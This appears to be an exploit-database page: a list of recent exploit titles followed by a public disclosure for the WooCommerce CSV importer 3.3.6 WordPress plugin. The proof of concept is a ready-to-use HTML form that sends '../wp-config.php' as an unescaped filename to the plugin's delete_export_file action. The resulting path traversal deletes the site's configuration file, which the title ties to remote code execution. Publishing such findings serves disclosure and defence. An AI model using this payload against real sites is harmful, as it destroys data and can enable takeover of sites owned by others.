
19 changes to exploits/shellcodes WebKit - WebAssembly Parsing Does not Correctly Check Section Order CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure H2 Database - 'Alias' Arbitrary Code Execution GoldWave 5.70 - Local Buffer Overflow (SEH Unicode) PMS 0.42 - Local Stack-Based Overflow (ROP) Unitrends UEB 10.0 - Unauthenticated Root Remote Code Execution WolfCMS 0.8.3.1 - Cross Site Request Forgery Cobub Razor 0.7.2 - Add New Superuser Account MyBB Plugin Recent Threads On Index - Cross-Site Scripting WolfCMS 0.8.3.1 - Open Redirection Yahei PHP Prober 0.4.7 - Cross-Site Scripting WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection KYOCERA Net Admin 3.4 - Cross Site Request Forgery - Add Admin Exploit Buddypress Xprofile Custom Fields Type 2.6.3 - Remote Code Execution WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution iScripts SonicBB 1.0 - Reflected Cross-Site Scripting WordPress Plugin Google Drive 2.2 - Remote Code Execution
35 lines
No EOL
930 B
Text
35 lines
No EOL
930 B
Text
# Exploit Title: Plugin Woocommerce CSV importer 3.3.6 – RCE – Unlink
|
||
# Date: 08/04/2018
|
||
# Exploit Author: Lenon Leite
|
||
# Vendor Homepage: *https://wordpress.org/plugins/woocommerce-csvimport/
|
||
# Software Link: *https://wordpress.org/plugins/woocommerce-csvimport/
|
||
# Contact: http://twitter.com/lenonleite
|
||
# Website: http://lenonleite.com.br/
|
||
# Category: webapps
|
||
# Version: 3.3.6
|
||
# Tested on: Ubuntu 16.1
|
||
#
|
||
|
||
1 - Description
|
||
|
||
- Type user access: any user registered.
|
||
- $_POST['filename'] is not escaped.
|
||
|
||
2. Proof of Concept
|
||
|
||
<form method="post"
|
||
action="http://target/wp-admin/admin-ajax.php?action=delete_export_file">
|
||
<input type="text" name="filename" value="../wp-config.php">
|
||
<input type="submit">
|
||
</form>
|
||
|
||
|
||
- Date Discovery : *11/23/2017*
|
||
- Date Vendor Contact : *12/29/2017*
|
||
- Date Publish : 08/04/2018
|
||
- Date Resolution :
|
||
|
||
|
||
#*Atenciosamente*
|
||
#
|
||
#*Lenon Leite* |